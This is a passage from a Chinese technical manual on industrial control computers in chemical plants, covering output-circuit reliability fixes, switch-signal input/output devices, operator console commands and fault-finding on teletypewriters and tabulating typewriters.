状态,保证在发生故障时,蓄电池有充足的电量。某石油化工厂 还在每台电/气转换器的正极信号线上,串接了100限流电阻,这 样即使出现短路,电流最大不超过3A, 不使稳压电源因过载保护 动作而断电。 装设输出总电流表。当发现总电流过大时,可以及时排除故 障,经过这样改进后,虽然出现过几次短路事故,但并未引起输 出停电事故,保证了安全生产。另外为了防止电源自身故障而备用干电池,因电量不足,而将干电池改成了电瓶,并采取了“浮 充”措施。 二、 加装输出定位线路、除去发生事故的隐患 在机器的输出电路上,由于共用振荡电路损坏或切换电路故 障,都会出现各路输出为零,造成生产事故。为此某石油化工厂在 输出电路中增加了定位器,此电路是在每一个控制回路中用一个 小型定位器,平时就调到一个正常的使用点上,在出故障后,这 个线路就能保证有一个误差不大的电流输出,以防止执行机构的 误动作,避免事故的发生。 三、 自制极性鉴别器,增加机器判别正负溢出功能 在机器输出控制调节回路时,需先判别阀位的状态,是关还 是开。兰化化肥厂控制机输出为0~10mA 直流信号,0mA 是阀 位的全关,10mA 是全开。因为模入时0~10mA 要转换成0~100mV, 当信号大于100mV 时,为溢出。小于-30μV也为溢出。两 种溢出是两种状态,即一种是阀全开状态,另一种是阀全关状态。 由于模入部分原设计没有正负溢出判别能力,故当机器模入自检 阀位发生溢出时无法知道是全关还是全开状态,此问题如不解 决,势必会造成操作上的事故。为此,该厂设计了一套极性鉴别线路。线路原理:当模入信号≥50mV 时,经 BG₁放 大 ,BG₂ 、BG₃ 功放,使继电器动作,接点闭合,触发器P₂ 被置“1”。P₂ 是原 设计中的一个溢出触发器。当P₂=1 时,说明该路采样信号产生 溢出,究竟是正溢出,还是负溢出,就看鉴别器是否动作。当鉴 别器动作, P₁ 置“1”,说明该溢出为正溢出;而鉴别器不动作, P₁ 置“0”,则说明是负溢出状态。这样,当机器模入数码时(包 括正、负溢出状态),程序略一判断正、负溢出,即可知阀处在 全关还是全开状态,解决了极性鉴别问题,避免了误动作。 四、提高线路抗千扰能力的一些方法 (一)利用阻容滤波抗干扰 由于存在输出干扰引起中间继电器无规则的跳动,这又导致 执行机构频繁的开闭现象,这不仅会损伤切断阀的寿命,更主要 的是引起工艺流程上的误操作,这是绝对不允许的,为了消除这 种干扰的影响,在每条输出线上外接阻容对干扰信号起缓冲的办 法加以解决。 (二)消除机器长引线干扰 并排的长引线,往往因为电磁耦合和阻抗不匹配所引起的讯 号反射,在末端会有不必要的讯号输出 干扰。某化肥厂通过电 阻给正与非门的一个输入端接+10V电压,以提高基-射偏压,使 小讯号不能产生输出,从而消除上述的干扰。 为了不改变“长引线”上讯号的极性,故在缓冲器后加反相 器FX,R 接到哪个输入端上这不是关键,而R 的大小是最主要的。 (三)克服零线漂移,提高机器抗干扰能力 HOC-510 是晶体管计算机,它有工作电源和偏置电源,消耗 的电流相差很大,在零线上要产生较大的静态压降,使离电源装 置较远的工作电压Ec比电源电压低和偏置电压E₀ 比电源电压高, 形成了很大偏差。这将破坏逻辑电路正常工作,降低了电路的抗 干扰能力。为了克服零线飘移,提高抗干扰能力、我国某自动化 所力求供电距离最短,使每个机柜有自己独立的电源,并加粗零线。而外围电源为了避免零线漂移和馈电线的压降,把稳压电源 采样线直接引至负载端。 五、模出相位的自动修正 某有机化工厂 TQ-1 机模拟量输出采用的是三相六拍式步进 电机带动电位器的方案。为了保证输出的精度,每次启动某台电 机工作之前,除把本次需要输出的增量(步进电机转动步数与正 反转信息)送到模出通道的寄存器外,还要把上次该台电机停转 时保存下来的相位从专用单元中取出,送到相位寄存器,本次启 动就是在上次停转时相位的基础上继续转动。 电机启动后,便沿指定方向,按照六拍式电机的相位次序转 动,走完给定的步数(六种相位是:001、010、011、100、101、 110分别表示三相马达的通电状态,如果相位码成为000或者111’ 则表示马达处于平衡状态,即不能转动)。设置和保护相位的工 作,是由管理程序来完成的。该厂在管理程序中增加了判别和修 正相位的程序,即当从专用单元中取出上次保存的相位信息后,首 先判别它是否为六种相位之一,如果是000或111状态则自动修正 为六种相位之一,送入相位寄存器。这样就防止造成生产事故。 六、步进电机和多圈电位器联接方式的改进 由于系统中恒流源输出的变化,以及非线性因素的影响,再 加上输出系统的故障等原因,会使步进电机产生输出过头(输出 量超过实际余量)的现象,为了保护继电器等设备,许多使用单 位采取了切实可行的步进电机和多圈电位器的联接方法: 1. 某有机化工厂采用了“软联接”的方法,即当输出过头时, 由于步进电机与电位器间采用了带打滑的连结轴,保护了继电器 等设备,为了保证同心度,电位器底座用软联结。经几年使用效 果良好。 2。某化肥厂采用了壁厚1.5mm 透明塑料管的软联结简单可 靠,已运行五年以上未出现过问题。 3. 某炼油厂使用了橡皮摩擦轮的软联接,经几年运行效果 良好。 七、输出信号返回到输入端检查其正确性 为了验证输出调节量是否正确,目前大部分使用单位把每点输出信号返回到机器的模拟量输入端,经过采样、放大、模/数 转换后可以显示出来,以此来检查机器输出的正确性。 八、实现无扰动切换、平稳工艺操作 在系统正常工作的情况下,调节回路由机器控制,而当系统 故障或者在一些非正常生产状况(开车、停车过程或事故状态) 下, 一般由人工进行手动控制。为了区别手动与自动两种状态, 某有机化工厂为每个回路增设一个开关,并把开关状态通过开关 量输入通道引入机器。在直接数字控制过程中,当机器查到某个 回路处于自动状态时,机器就进行采样、计算和输出,如果机器 查到某个回路处于手动状态,机器就不进行采样、计算,而是将 该回路的一次偏差单元,二次偏差单元清“0”。这样,当一个回 路由手动切换到自动时,只要改变开关状态之前,将测量值与设 定值对齐,就保证切换是无扰动的。 对于较复杂的多回路综合控制,该厂加了一个中断按钮。按 一下此按钮,就表示要进行无扰动切换。这时,机器对各个有关量 进行“取平衡”的工作,然后可将开关由手动打向自动位置,就 实现了无扰动切换。 九 、机器掉电自动切换列仪表位置 由于采用权电阻数/模转换网络输出方式,当机器发生掉电 时,不能保持输出,这样会对工艺生产造成停车或发生严重事 故。为了克服这一缺点,确保安全,某化肥厂采用图8-12接线方 法,当机器正常时,若某一路投入控制,将某路开关闭合,计算 机输出电流即可到电气转换器,以便控制调节阀。当机器240V电 源掉电或仪表24V电源掉电,那么继电器就动作,这样就从计算 机自动控制切换到仪表遥控。不过在机器控制情况下,人工事先 将仪表遥控拨到与机器输出电流相同位置上,这样在机器发生掉 电时,切换到仪表位置不会引起工艺波动。 第九章 开关量输入输出设备 第 一 节 概 述 在生产过程中如阀门“开”或“关”的信息,某设备的“启” 或“停”的信息,报警单元来的报警信息,色谱组别信息及涡轮 流量等来的累计信息等,这种类型的信号,只有两种状态。如电 平高低,断、通等等。故称这种信号为开关量信号。 随着我国工业自动化不断发展,开关量输入输出在计算机外 围通道中已占有比较重要的地位。 第二节 开 关 量 输 入 开关量输入装置的任务是将现场的开关信号和仪表盘中的各 种开关的继电器等接点信号有选择地引入计算机。 开关量输入功能如下: ① 对生产过程被控点进行状态记录。 ② 根据需要,可任意选择被控点地址之一,随时把开关状 态送入主机,也可顺序把开关状态全部送入主机。在一般情况 下,应对全部开关状态进行固定周期的巡回检测,发现问题可以 及时处理。 ③ 对生产影响较大的被控点,如果发生异常状态,可以产 生中断,及时向主机发出中断信号,申请故障处理。 开关量输入一般有下列几种输入形式: ① 阀门状态输入:信号形式是接点,输入方式采用成组输 入,由主机控制选组输入,也有单个输入。 ② 涡轮流量计输入·(计数输入):信号形式是脉冲。输入 方式采用通过中断输入,由主机累计计数。 ③ 操作台设置键输入:讯号形式是电平,输入方式采用由 主机控制选组输入。 第三节 开 关 量 输 出 开关量输出装置的任务是产生开关量信号,用以操作生产现 场的两位式装置或阀门的开与关。主要是通过开关量输入、模拟 量输入、数字量输入、脉冲量输入等有关输入到计算机进行计算 和逻辑判断。其中的一部分结果以开关量输出的形式来输出,以 实现对被控开关进行控制。如果被控制现场的某些装置,不在最 佳状态或越限时,通过外围输入设备告诉计算机,计算机经过一 定的计算和逻辑判断,再通过开关量输出,去闭合或打开现场的 相应开关,从而保证了生产过程的正常运行和自动化,并有可能 使生产按最佳状况来进行。 开关量输出的主要功能如下; ① 报警:可以用声信号或光信号。如生产过程中机器电源 发生故障或越限时,就需要报警;再如开关量输入中,中断开关 改变状态时,送计算机确定事故开关编号后,就通过开关量输出 报警;还有在模拟量输入时,每经过一定点数后,请求计算机中 断,计算机在响应中断后,就转入去执行输入比较程序,将刚送 入内存的输入信号与预先存放在内存相应单元的标准信号相比 较,如果出现越限时,就通过开关量输出去报警。 ② 接通或断开现场的子回路、利用开关量输出的开关来控 制子回路的开关。 ③ 直接控制:直接控制是指开关量输出的开关直接在现场 的回路中,例如使一个步进电机的转动或停止,使一个阀门关闭 或打开,如果被控制的开关电流或电压较大时,也可以通过中间 继电器来对现场开关控制。 由于开关量输出具有报警、接通或断开子回路及对现场进行 直接控制等功能,因此就能预防现场事故的发生,及时对现场事 故进行处理,从而保证生产过程的正常进行。例如进入计算机的 某一参量(如模拟量输入)超过规定值或发现变化趋势不正常 时,我们就可以改变开关量输出状态,预防事故的发生。当已出 现事故时,开关发出中断信号给计算机,计算机响应中断后,便 转入执行事故诊断程序,根据各参数变化的情况,进行综合判 断,对事故进行处理,打开或合上某个或几个开关,紧急地打开 或关闭某个或几个阀门。 第四节 提高开关量输入输出设备 可靠性的措施 为提高开关量输入输出设备的可靠性,有些单位曾采取以下 一些措施。 1. 采用计算机开关量输出控制打字机自动启、停电以后, 发现启、停时的冲击电流对机器其它线路有很大干扰,为此某自 动化研究所在打字机电源线上加了屏蔽,并在开关量输出继电器 接点两端并了一个0.2HF 的电容,同时对于机器受干扰的小信号 线使用双绞线后,较好地克服了线间串扰,提高了可靠性。 2。为了提高开关量输入装置抗干扰能力和适应接点和电压 两种输入信号工作方式,某厂采用了变压器隔离输入方式,如图 9-1。 输入信号: 1)接点:2000以下为“1”信号 100KQ 以上为“0”信号 接点耐压5V以上容量20mA以上。 2)电压0V±1V (阻抗2000以下)为“1”信号,4.5V以 上25V以下为“0”信号。 电路原理:将开关S₁ 反复开闭,使初级线圈上反复加上直流 电压时,在次级线圈中将产生交流电压。这个交流电压用二极管 整流加到电容C₁两端,如果输入为“0”状态(100KQ以上的电 阻或4.5V以上的电压),那么电容C₁被充电,相当于次级负载Rt,很大,根据R=n²RL, 可知R 也很大,成为R》R₁ 的关系。这时 S₁关闭时的输出为低电平如果输入为“1”状态(2000以下的电 阻或小于±1V的电压),那么电容C₁被放电,相当于次级负载Rr 很小,根据R=n²Rt 可知R 也很小,成为R<R₁ 的关系,这时S₁ 关闭时的输出为高电平。(S: 为程序查询扫描开关)经过变压器 耦合,使现场和计算机隔离,这样可以提高计算机工作的可靠性。 3。某化肥厂在实践中发现,远距离开关量干扰信号会造成 中断系统工作不正常,甚至使主机程序错乱。产生的原因是开关 线路经过强电场带入了干扰。该厂采用中间继电器隔离方法,解 决了这一问题。 4. 开关量输入输出采用光电隔离元件作电讯号隔离用,抗 干扰能力强。这在近几年,已有很多单位准备采用。 其原理是把电信号变为光信号,再由光敏元件接收变为电信 号输出。 第十章 操 作 台 在工业控制机中,为了便于机器和人的联系有效地控制生 产、操作方便, 一般将机器所能完成的各种功能都集中在操作台 上,目前在石油化工系统中,计算机操作台的功能大致相同,不 同之处只在于操作台大小及形状结构不同。 一般工业控制机操作 台应具备以下几点功能: 1. 参数显示(检测参数、各控制回路 PID 整定参数和给 定数)。 2。时钟数字显示(包括时钟修正功能)。 3。要求机器随机完成各种功能(如临时制表、改变制表时 间等)。 4. 机器故障报警(包括声报警、光报警、检测参数越限 报警)。 大部分使用单位为了在机器发生故障时,便于及时调节,把 各路模拟输出操作单元也装设在操作台上。为了方便于化工操 作、减少操作人员, 一般操作台应放在仪表控制室,操作人员既 监视到仪表控制系统和工艺状况,又看到了计算机控制效果,这 不仅使计算机控制方便,也便于机器出故障时,方便于操作人员 迅速切换到手动,同时要求操作合离机房不能过于远,目前各使 用单位的操作台都放在仪表控制室,机房离控制室也很近,有利 于操作人员与计算机值班人员取得联系。 5。目前在计算机进行在线控制时,往往由于工艺状况变化, 立即需要改变某一路给定值。过去,很多单位通过控制打字机输入数码,将新的给定值送入主机。但往往在送数过程中容易按 错,特别在处理紧急问题时不方便,其速度跟不上要求。为了改 变这一状况,目前有的单位在操作台上设计了模拟给定,就是改变某一路给定值,采用模拟给定输入,每一控制回路的给定值用 一个0~10mA 遥控表来表示,输入到主机模拟量输入系统,作 为一个特殊的检测点,主机不断询问该点有无变化,因此若要改 变某一路给定值,操作人员只要将这一路的给定值所对应的遥控 表输出电流旋钮改变一下,其改变后的电流数值,就是这一路新 的给定值。为了安全,当改变新的给定值时,机器立即显示给定 值数码,待操作人员确定无误后,按下动作按键,主机才按新的 给定值调节,这样操作安全可靠。 ARCH-1000 型操作台结构简单,体积小,操作方便,它包 括:读纸带按键、暂停按键、转移A 按键、转移 B 按键、报警 灯、喇叭、时钟显示器、参数显示器、在/离线锁、命令锁、动 作按键、命令旋钮开关、点号旋钮开关等。 读纸带按键 是启动纸带输入机,把纸带数码送入机器内存。 暂停按键 是将机器运行中的程序暂停,回到固定存储器 等待。 动作按键 它与命令旋钮开关配合,给机器一个中断信号, 使机器执行各种命令功能。 转移A 按键 是将机器运行转移到“在线”控制程序启动 单元。 转移B 按键 是将机器运行转移到引导程序单元。 在/离线锁处于“离线”位置时,表示机器与外界输入信号 脱开,机器可进行检修或通过纸带输入机,向机器内存输入各种 程序,或执行各种检查程序等功能。 在/离线锁处于“在线”位置时,表示机器与外界输入信号 接通,执行“在线”控制程序。 命令旋钮开关是一个多接点切换开关。它的位置所代表的命 令内容是预先规定好的,以提供人与机器的联系,要求机器做出相应的各种功能。命令旋钮开关1表示命令代号十位。命令旋钮 开关2,表示命令代号个位。例如06命令的功能是显示参数值, 点号旋钮开关的位置给出所要显示的点号。操作步骤是:首先将 命令开关(十位)拨到0位置,个位开关拨到6位置,点号开关 若是拨到005位置(即百位拨到0,十位拨到0,个位拨到5。) 然后按一下动作按键,机器立即在参数显示器上显示第5点的参数值。 为了保证安全,执行重要命令时,还必须与命令锁状态相配 合。例如:执行08命令,它的功能表示遥控某一路阀位电流,由于此种功能很重要,直接影响到工艺状况,为了防止非操作人员 误操作,在操作过程中,要求此命令与命令锁相配合,因此执行 此命令时,除将命令开关拨到08位置外,还要将钥匙插入命令 锁,由垂直位置拨到水平位置,这时按一下动作按键,并在控制打字机上打出输出阀位电流所对应的数码。当打字机打出的数码 与所要输出数码一致无误时,再在控制打字机上按下执行符号“回车”加“换行”,则机器立即执行其功能。若在控制打字机 上打入输出数码的过程中,发现错误,则按下“?”号,则以前打入之数码全部作废,再重新打入正确的数码。 目前 ARCH-1000 计算机编制了二十一种命令,上面介绍了 两种命令的使用,其它各种命令,操作方法与上述类似。 第十一章 外 部 设 备 第一节 概 述 在工业控制机中,无论是哪一类型的机器,其外部设备一般 都配有控制打字机、制表打字机、纸带输入机、纸带穿孔机、磁 鼓等。这些设备可以说在一台完整的控制机中都是不可缺少的。 目前,在我国自己生产的计算机中,其控制打字机多选用BDO55 型电传打字机。这是一部已生产多年的定型产品,质量较好。纸 带输入机和纸带穿孔机则生产或者试制厂家较多,种类也较杂。 前一阶段有的计算机选用了一些不很成熟的试制品,这些试制品 有的只生产几台就不再生产了,这就给设备的维护工作带来一定 的困难。例如备品配件不易解决,设备本身缺欠难以克服,致使 设备无法继续使用下去。近几年来,由于计算机生产数量的增 加,外部设备的需求量也加大,在制造的过程中不断地改造和完 善,现在已有很多厂家生产的外部设备比较可靠好用。 除此之外,我国还进口了一部分工业控制机。其中控制打字 机有美国的IBM公司专为计算机配套生产的球形打字机,英国的 Creed75 型电传打字机等。其中Creed75 型电传打字机,是经过 改造之后用在计算机上的。突出的改造部分是将原串行码改为并 行码,单相串激电机改为同步电机。进口控制机中的制表打字机 几乎全部选用IBM公司生产的打字机。这是一种已大批生产并倾 销世界各国市场的打字机,各国计算机生产厂家在配套时都直接 选用。至于纸带输入机、纸带穿孔机等其他一些外部设备,由于 结构简单,制造方便,大部分都是计算机生产厂家自己制造的, 所以仍然是各家不一,品种繁多。这些设备一般都附带一些易损 坏零件做备品,随成套设备一起进口, 一般情况下如使用维护得当,这些外部设备可以使用相当长一段时间。 这里所要介绍的一些常用的外部设备,主要是从使用维护的 角度出发,介绍一些有关这方面的经验。对于每台外部设备的原 理,则从简介绍。另外,除了上述谈到的一些常用的基本设备之 外,有的工业控制机还配有快速打印机、卡片机、屏幕显示、磁 带、磁盘等等。对于这些设备,目前国内现有的工业控制机配备 的尚少,维护方面的经验更少,就不介绍了。 第二节 BDO55 型电传打字机 一、工作原理 接触过计算机的人都熟悉BDO55型电传打字机,但它并不 是为计算机配套设计的,只能说是代用品,结构上有很多地方与 计算机的要求是不相适应的。BDO55 型电传打字机是有线通讯 设备,它的设计是结合通讯特点进行的。例如采用串行码是为了 减少通讯线路。但在计算机中使用最好是并行码,这样既简化了 计算机的电子线路,又省略了打字机的排码机构,更重要的是有 利于以后的维护工作。可是现有的计算机都是直接选用,没有任 何改动。 在选用BDO55型电传打字机时,各家的设计思想也不统一。 现有的计算机在选用时有两种设计方法, 一种是采用并行码输出 至打字机触点上排码,排好的码即为串行码,此串行码重新进入 计算机经功率放大驱动译码电磁铁,如图11-1。另一种是将计算 机送给打字机的信息码,按打字机同步速度的要求,串行排好 队,直接进行功率放大,去驱动打字电磁铁。 以上两种方案比较一下就可以看出:第一种对打字机的速度 要求不甚严格,无需经常校准打字机的串激电机速度。第二种方 案必须严格校准打字机的速度,否则即要与计算机送出的信息失 步,造成打印错误。第一种送出的是电位信号,处理打字机故障 时“在线”检查比较方便;第二种是脉冲信号,机器送给打字机 的信息瞬间将要自动消失,所以处理打字机故障时检查不方便。 从打字机的控制逻辑线路看,第二种也比第一种复杂。已经选用 了第二种方案的机器,从长远使用维护方便的角度来看,最好改 成第一种。改造工作量很小。如图11-2,将移位计数器及同步信 号源拆除,按图11-1将缓冲寄存器输出之五个信息码直接引入到 打字机触点上,然后在一个“门”上排好队,进行功率放大,去驱 动电磁铁。这里,在改动时只增加了一个“门”,所用元件甚少。 用拆下来的同步信号源中的元件就足够有余了。剩下来的移位计 数器还可以做计算机其他部分的备品。 二、故障处理 关于BDO55电传打字机维护保养方面的一些常识,打字机 出厂时都带有一本说明书。那里已经详细地介绍各部件及整机拆 卸装配调整方面所必须的知识,因此就不再介绍了。这里主要是 介绍一下打字机“在线”运行时,也就是与机器连用时,其故障 判断及处理方法。 一台打字机“在线”发生故障,可能产生于纯机械部分,但不能排除电子控制回路发生故障的可能性。因此, 当一台打字机出了故障之后,不能急于“离线”检查,应该借助 于“在线”运行去观察各部零件动作情况,即使是机械部分出了 故障,在打字机连续动作时也比较容易观察出。当线路部分出了 故障时,打字机必须“在线”才能对计算机给出的信息是否准确 进行测量和检查。 打字机出现故障之后,其表现形式无非是:(1)打印错; (2)打字机启动不打印;(3)各功能作用部分失灵,如:升 格、回车、字符转换等;(4)输入信息码错;(5)偶然跳动。 下面以第一种设计方案为例,逐项进行分析。 (1)打印错 一台打字机不论出了什么故障,其检查顺序 都必须首先从机械部分着手。当排除了机械部分产生故障的可能 性之后,可进一步引向电子线路部分,这是因为相对比较起来, 机械部分的故障率要高得多。当打印出错时,同样应首先检查机 械部分。检查方法:在打字机启动打印的同时,观察各部零件动 作变化情况,有些出现明显零件损坏的情况,便立即可以查出。 如果发现不了有零件损坏之处,此时应检查触点与译码磁铁动作 是否失步。这样逐级检查,便可断定故障产生于打字机本身,还 是在控制回路部分。 当确定是控制回路故障时,应将打字机实际打印出之符号编 码与计算机给出之符号编码进行对照, 一般来说是应该有规律 的。譬如五个信息码中有一码增加或丢失。码的增加或丢失有两 种可能: 一是触点误动作,二是该信息码通道产生故障。前者在 打字机启动后用肉眼可以观察到,后者可以通过人为的办法改变 通道状态,测量其信息变化,即可查出。当核对出打字机实际打 印出之符号编码与计算机给出之符号编码之间无规律时, 一般情 况下还应断定故障出在打字机本身。 (2)打字机启动后不打印 打字机启动后不打印有两种表 现形式: 一是打字机电机启动,但空转不打印;二是打字机启动 后,离合器也动作,但不打印。出现第一种情况可能有三种原因:① 离合器失灵。须首先检查并将故障排除之。② 启动电 磁铁(不是译码电磁铁)失灵。这可以在打字机停止运行时,用 手拨动一下磁铁的衔铁,看看行程是否符合要求,如果行程太短 当然就无法驱动离合器使其“合闸”,此时调整一下即可。③ 回答信号没给出。当打字机接收启动指令启动之后,应给出一 回答信号,表示此时打字机可以接收机器给出的打印。这个回答 信号也就是机器建立中断的一个组成部分, 一般是以触点方式给 出的,当因触点接触不良或触点上有灰尘等污物时,回答信号就 可能丢失。此时应清洗触点,有必要时还可调整一下触点的间 隙。发生第二种情况时,故障比较容易判断。当打字机空跳时, 观察五个译码条是否动作。如果译码条动作,就证明故障出在打 字机本身;如果译码条不动作,就可以肯定是机器给打字机的信 息未送出,需检查机器之信息通道及控制回路。 (3)各功能作用部分失灵 如升格、回车、字符转换等。 凡打字机打印准确,功能作用其一或其二出了问题,则无需怀疑 控制回路部分,可以断定是打字机的纯机械故障。在故障发生 后,可以“在线”进行观察,也可以用手操作各有关功能键,观 察各有关零部件动作是否准确,或者是否有损坏现象。如零件无 损坏,而动作又失灵,这就是零部件之间的合理间隙,在打字机 工作过程中由于磨损或螺丝松动而受到破坏所致,按规定调整之 即可解决。对于零件之间的间隙调整在打字机维修过程中遇见的 非常多, 一般都不可能一次调整成功。需要反复试验反复调整多 次,才能达到合理。 (4)输入信息码错 在打字机输出打印正确的情况下,可 以首先排除考虑打字机本身的故障。因为输出打印时所接触到的 打字机零部件,已全部包括输入打印所接触到的打字机零部件(除 键盘部分外),而键盘的检查只在静态时用人工操作几次就完全可 以看出动作是否正确,因此,输入信息码错, 一般的是出在打字 机的输入通道上,或者是控制回路上。但如果是出在控制回路 上,读到机器里的信息应全是“0”或者是无规律。当通道出错时一般不会五个信息码同时都错,仍需通过打印输入与机器实际 接收到的信息码做一比较,看出错在那一路,将出错缩小到一路 上,就可以按顺序查找,比较容易解决。 (5)偶然跳动 这是一种比较难以解决的问题。它产生的 原因多,出现的次数少,此种差错率可能达不到千分之一,甚至 出现一会儿多、 一会儿少。尽管出现的概率少,首先仍需观察是 否有规律。 一般情况下是应该有规律的。举个例子来说:打字机 升格不灵,偶而出现重行现象。打字机的升格动作,是由机器给 出固定的信息码,经过机械译码后执行。假若出现该升格而不升 格的情况,则不是信息码给错,就是相应的机械机构存在问题。 而信息码给错必然要转换成其他动作,譬如打印成符号,那么就 要核对该符号与升格在信息上差别所在,以此顺藤摸瓜进行查 找。当发现升格动作并没有转换成其他动作时,应肯定打字机升态,因此,打字机检修之后,要求调整准确、定位牢固,避免在边缘状态工作。 第三节 其他类型的控制打字机 除了 BDO55 型电传打字机外,当前使用的还有球形字头打 字机、柱形字头打字机等。 球形字头打字机是专为计算机配套设计的,与计算机进行信 息交换时,采用并行码,不再设有串行码变为并行码的排码机 构,因此从整体结构来说比电传打字机要简单得多,美国IBM 公 司生产的球形字头打字机,输出输入都是六单位并行码,打字机 采用同步电机做动力,打字机在与计算机进行信息交换时采用打 字机上的触点做同步信息,因此对打字机启动等瞬间速度要求不 甚严格。打字机最高速度可达每秒16个符号。该打字机的工作原 理是:在打字机接收六单位信息之后进行机械译码,然后通过两 条传送钢带传送到球形字头。其中一条钢带是字或是符号的选 择,另一条钢带是字符转换。这里需注意的是,钢带是该打字机 的薄弱环节, 一般都随机带有备品,但是如使用和保护不当,将 缩短钢带的寿命。在机使用的钢带要涂上足够的润滑油,保护不 使其受腐蚀。钢带一旦受蚀,那怕是极微小的一点,也要产生应 力集中,致使钢带断裂。备品钢带也要涂脂防腐。 对于球形字头打字机的维护及故障查寻,都比 BDO55 型电 传打字机简单,这里不需要再考虑信息在打字机内部同步问题。 打字机出了故障之后可以“离线”用人工代替机器给出信息进行 设置,判断故障出在信息通道部分还是打字机本身。在抛开信息 同步问题之后,也可以采用BDO55 型电传打字机处理故障的办 法进行。当然两台打字机结构不同,处理故障也有不同之处。例 如球形字头打字机,会出现同一个字符打印时,左面轻右面重, 或右面轻左面重, BDO55 型电传打字机就不会出现这种故障。 出现这种情况时,调整一下球形字头下面的限位制子就可以了。 柱形字头打字机是属于电传打字机的一种,Creed75 型就是 柱形字头打字机。该打字机虽然进行了一些改造,但仍然保留一 些适用于串行码的机构,所以机械结构仍然比较复杂。Creed75型电传打字机还有一个缺点,就是输入触点密封在打字机的里 面,检查故障非常不便,该打字机目前在国内使用不甚多,这里 就不介绍了。对于它的故障判断和处理也可参照BDO55 型电传 打字机进行。 在计算机的外部设备中,控制打字机是机械结构最复杂、维 护调整最困难的一个设备。因此,在检修时,要按出厂说明书的 要求进行装配调整。例如每台打字机都装有头架或字头回车缓冲 装置,即汽缸,要充份利用汽缸的缓冲性能,减少机械冲击,防 止损坏机械零件。 第四节 制表打字机 一、工作原理 我国自己生产的工业控制机中,多采用飞鱼牌打字机。在进 口的机器中,多选用IBM公司生产的Typewriter 。 制表打字机 在工业控制机中是作为记录工艺参数用的,以代替人工抄表。根 据工艺条件及其他因素,在一台控制机中可以选用一台或几台制 表打字机。在选用几台时可以放在一个外部通道里,也可以每台 单独占有一个通道。 制表打字机只接收计算机的信息,完成其制表打印功能。虽 然也带有键盘,但没有信息输入功能,键盘的功能是“离线”时 做为打印或复制使用。制表打字机一般不带有机械译码器,而由 电子线路译码器代替。因此与控制打字机比较起来,简化了机械 机构,提高了打字机的可靠性。由于机械译码器被电子线路所代 替,打印符号及功能作用除了动力由同一个电机供给外,各自都 有单独驱动的电磁铁,互不牵连。 打字机在和机器进行同步时有两种方法:①采用打字机内触 点做回答信号,以进行同步;②由计算机根据打字机的速度,给 出打印符号以进行同步。两种设计方法各有优缺点。采用第一种方法,打字机可以全速工作,速度较第二种快。当打字机卡死 时,所要打印的符号能保存在机器内不致丢失, 一旦打字机恢复正常,会按顺序继续打印。缺点:当打字机触点接触不良时,会 丢失回答信号,使其无法工作下去。采用第二种方法时,它的优 点正好是第一种方法的缺点,缺点也正好是第一种方法的优点。 现有的计算机一般都选用第一种方法。至于触点接触不良现象出 现极少,因为打字机总在工作,触点总在摩擦,如果不是因为较 多油污附在上面,触点的接触电阻不易增加到不允许的程度。 二、故障处理 制表打字机由于机械结构比较简单,各字符间都有各自单独 的控制系统,检查及处理故障都比控制打字机方便。当打字机发 生故障时,应结合操作键盘进行处理。处理故障时, “在线”、 “离线”都可以。要按具体情况对待。这里再以几种故障现象为 例,说明一下制表打字机检查及处理故障的方法:①字符打印轻 重不一致;②丢字符或功能动作如回车等失灵;③打字机偶然卡 死。这里需要说明一点,无论发生何种情况,都可以用操作键盘 进行检查, 一旦键盘检查证明打字机无误,即是电子线路故障。 因为每一个字符下面都有一个驱动电磁铁,人工操作与机器输出 驱动不同之处,只是人按和磁铁拉的区别。下面就把上述几种故 障现象讨论一下: ① 字符打印轻重不一致 制表打字机下面有一排调整螺 丝,系调整打印轻重用的,发现某一符号打印过轻或过重,调整 下面的对应螺丝即可。但有的制表机需调整头架,这要视打字机 结构不同而定。 ② 丢字符或功能动作如回车等失灵 先操作对应的键盘上 的键,如果无误,再用手按磁铁之衔铁,如不打印证明衔铁和被 推动元件之间距离太大,调整一下即可。如打印,证明是线路故 障,或者是打字机信号线插座接触不良,需要进一步查找。此时 也可以由计算机给该路一个信息,观察电磁铁是否动作来判断。 ③ 偶然卡死 制表打字机偶然卡死时,应观察是在打印字 符的过程中卡死,还是在头架往返移动时卡死。如果是在打印字 符的过程中卡死,多因回答信息未给出,此时应在打字机的插头上找出回答信号的输出 线,如图11-5中A 、B 两 端,以万用表欧姆档量其 内阻 , 要求内阻小于 0.50,假若内阻很大, 证明卡死的原因就在于此,须清洗全部触点,这些触点都是串在一起的,在清洗触点之 后还要用人工操作按键,观察万用表上的指针摆动变化,看是否 还有接触不良之处,以彻底清除之。 个别的制表机没有键盘,应“在线”进行检查及处理故障, 这种制表打字机目前使用厂家不多,这里不再介绍。 除上述现象以外,打字机在头架往返移动时也可能卡死。发 生这种现象时应确定是打字机本身的故障,然后沿着与故障有牵 连的元件进行查找。例如,打字机头架自左向右移动,即所谓的 回车,头架被卡死而未走到终点位置,那么就要检查摩擦离合器 的摩擦片和夹紧片间的距离是否合适,如不合适应按要求进行调 整。除此之外还要检查离合器的“合闸”和“释放”推动元件间 的相对位置是否准确,以排除引起回车误动作的可能性。这里需 要说明一点,就是当回车或其他动作引起打字机卡死时,可能电 机也要卡死,因为制表打字机的电机功率很小,象回车这样需要 瞬间动力大的情况则完全依靠电机起动旋转后的惯性。不妨做个 实验:先把回车离合器合闸,再启动电机,此时电动机是启动不 了的。这里采用小功率电机主要是为了保护打字机零件,防止扭 伤和折断打字机零件。因此当发现电机卡死时,应关掉电源,防 止电机烧坏。 制表打字机做为工艺参数记录用,都放在工艺操作室内,环 境比起计算机房要差。因此最好用有机玻璃罩罩好,防止大量灰 尘侵入打字机内,腐蚀机械零件。打字机记录纸一般24小时换一 次,也就是说一天罩子才打开一次,对工艺操作人员并没有增加 多少麻烦,但对打字机的保护却起了很大的作用,建议采用。 第五节 纸带输入机 一、光电型纸带输入机的结构 纸带输入机在计算机中是专供信息输入用的,这里只介绍光 电型纸带输入机(以下简称光电输入机)。 一台完整的光电输入机 包括纸带传送部分、光源及光敏放大器部分。其中纸带传送部分 是光电输入机仅有的机械部分,它包括纸带导向、制动、启动和 缓冲等几个部件。纸带的运动是靠一个小的同步电机做动力。根 据光电输入机的设计速度,纸带可以直接用电机的转子轴带动, 也可以通过变速装置带动。光电输入机的启动和制动,是由计算 机给出信息,通过电磁铁实现的。有的光电输入机配有启动和止 动两个电磁铁;有的光电机则只配有一个启动电磁铁。前者启动 电磁铁和止动电磁铁交错动作,即启动电磁铁励磁时,止动电磁 铁释放;止动电磁铁励磁时,启动电磁铁释放。后者是当启动 